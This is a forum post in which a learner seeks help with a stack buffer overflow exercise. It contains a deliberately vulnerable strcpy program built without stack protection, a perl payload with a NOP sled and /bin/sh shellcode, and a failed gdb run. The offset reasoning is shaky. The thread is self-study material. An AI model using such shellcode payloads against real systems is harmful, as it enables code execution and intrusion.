Name: Anonymous 2010-12-20 8:46
hey /prog/ im trying to learn about buffer overflows, im running ubuntu. I was wondering whether i need to compile this simple program with any certain arguments and if i need to do anything to my OS because i've heard GNU/Linux OS come with buffer overflow protection by default.
I compiled the program like this
Here's the program.
I've figured out how much garbage i need (I think).
Exploit test code to find eip
unless i did my maths wrong i get this, instead of a seg fault, so the eip isnt overwritten.
ANY help would be appreciated, thanks.
I compiled the program like this
gcc -fno-stack-protector abo1.c -o abo1Here's the program.
#include <string.h>
int main(int argv,char **argc) {
char buf[256];
strcpy(buf,argc[1]);
return 0;
}I've figured out how much garbage i need (I think).
buffer(256) - nops(150) = 106
buffer(106) - shellcode(43) = 63
buffer(63) + eip(4) = 67
garbage == 67Exploit test code to find eip
perl -e 'print "A"x67, "\x90"x150, "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80", "YYYY"'unless i did my maths wrong i get this, instead of a seg fault, so the eip isnt overwritten.
$ gdb abo1 -q
(gdb) run perl -e 'print "A"x67, "\x90"x150, "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80", "YYYY"'
Starting program: /home/test/abo1 perl -e 'print "A"x67, "\x90"x150, "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80", "YYYY"'
Program exited with code 064.
(gdb)ANY help would be appreciated, thanks.